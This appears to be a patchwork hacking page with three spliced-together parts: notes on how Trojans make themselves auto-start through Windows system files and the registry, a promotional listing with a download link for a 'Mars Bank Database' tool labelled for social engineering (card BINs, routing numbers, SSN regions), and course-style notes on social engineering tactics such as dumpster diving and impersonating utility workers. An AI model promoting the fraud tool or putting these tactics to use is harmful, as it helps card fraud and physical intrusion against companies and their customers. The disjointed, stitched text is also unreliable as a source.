    Most of the Trojans use auto-starting methods so that the servers are restarted every time the remote machine reboots / starts. This is also notified to the attacker. As these features are being countered, new auto-starting methods are evolving. The start up method ranges from associating the Trojan with some common executable files such as explorer.exe to the known methods like modifying the system files or the Windows Registry. Some of the popular system files targeted by Trojans are Autostart Folder, Win.ini, System.ini, Wininit.ini, Winstart.bat, Autoexec.bat Config.sys. Could also be used as an auto-starting method for Trojans.

    Mars Bank Database 1.1Last (For Social Engineering)

    Mars Bank Database 1.1 




    Features

    Banks database with search, filter and sorting possibilities. Contains 11 databases in one:
    - US banks ABA numbers (25,871 records)
    - US banks routing numbers (26,197 records)
    - MasterCard bank identification numbers (17,297 records)
    - VISA bank identification numbers (35,154 records)
    - American Express bank identification numbers (1,215 records)
    - US ZIP codes (70,884 records)
    - US busy phones (11,784 records)
    - Social Security Numbers regions (678 records)
    - US Dial Area Codes (249 records)
    - US states (65 records)
    - UK states (114 records)

    Bank Identification Number, BIN - first 6 digits from card number. You can identify any credit/debit card.

    For ABA numbers, database has these kind of data:
    ABA number, bank name, bank address, bank city, bank state, bank zip, bank phone.
    For routing numbers:
    routing number, bank name, bank city, bank state, bank phone.
    For MasterCard BINs:
    BIN, bank name, bank country, bank phone.
    For VISA BINs:
    BIN, bank name, bank country, card type 1, card type 2, bank phone.
    For American Express BINs:
    BIN, bank country (always USA), card type (gold, optima, platinum...), bank phone.
    For US ZIP codes:
    city, state, ZIP code, county.
    For US busy phones:
    state, city, phone.
    For SSN regions:
    first 3-digits of SSN, state.
    For US Dial Area Codes:
    3-digit code, states where this code used
    For US states:
    state (2 letters), state full name.
    For UK states:
    state name, country (England, Ireland, Scotland...).

    It's possible to make search, filter or sort base by any of this field or some fields together.
    Also you can add any notes with some text formatting and colors. This text will be auto saved.
    Program supports skins and includes 24 themes. Also it's possible to use .msstyles themes.


    Download


    http://www.mars-soft.net/files/MarsBanksBase11.exe

    Common Types of Social Engineering



    Social Engineering can be broken into two types: human based and computer based

    1. Human-based Social Engineering refers to person to person interaction to retrieve the desired information.

    2. Computer based Social Engineering refers to having computer software that attempts to retrieve the desired information
    Human based social engineering involves human interaction in one manner or the other. Computer based engineering depend on software to carry out the task at hand.
    Gartner Group notes six human behaviors for positive response for social engineering. Corroborate this with the traits discussed in module one of the course.
    Reciprocation
    Someone is given a "token" and feels compelled to take action.
    You buy the wheel of cheese when given a free sample.
    Consistency
    Certain behavior patterns are consistent from person to person.
    If you ask a question and wait, people will be compelled to fill the pause.
    Social Validation
    Someone is compelled to do what everyone else is doing.
    Stop in the middle of a busy street and look up; people will eventually stop and do the same.
    Liking
    People tend to say yes to those they like, and also to attractive people.
    Attractive models are used in advertising.
    Authority
    People tend to listen and heed the advice of those in a position of authority.
    "Four out of five doctors recommend...."
    Scarcity
    If someone is in low supply, it becomes more "precious" and, therefore, more appealing.
    Furbees or Sony Playstation 2.
    Source: Gartner Research

    Social Engineering Techniques: Dumpster Diving

    Information that companies consider sensitive is thrown out daily in the normal garbage cans. Attackers can successfully retrieve this data by literally climbing into the company dumpsters and pilfering through the garbage. Information such as names, Social Security numbers,
    addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere. I personally know a nationally recognized movie rental company that still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire
    roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay for their movies, and so forth.

    Another social engineering attack that also proves to be very successful is when an attacker dresses in the uniform of those personnel considered “honest” and “important” or even “expensive.” For example; an attacker purchases/steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools,
    etc. and perhaps even an “official-looking” identification badge or a dolly carrying “equipment.” These attackers generally have unchallenged access throughout the building as employees tend to see “through” these types of people. When is the last time you challenged
    one of these personnel to verify their credentials?

    This attack is very risky as the attacker can now be personally identified should he or she get caught. Again, this attack is normally very successful so bear this in mind.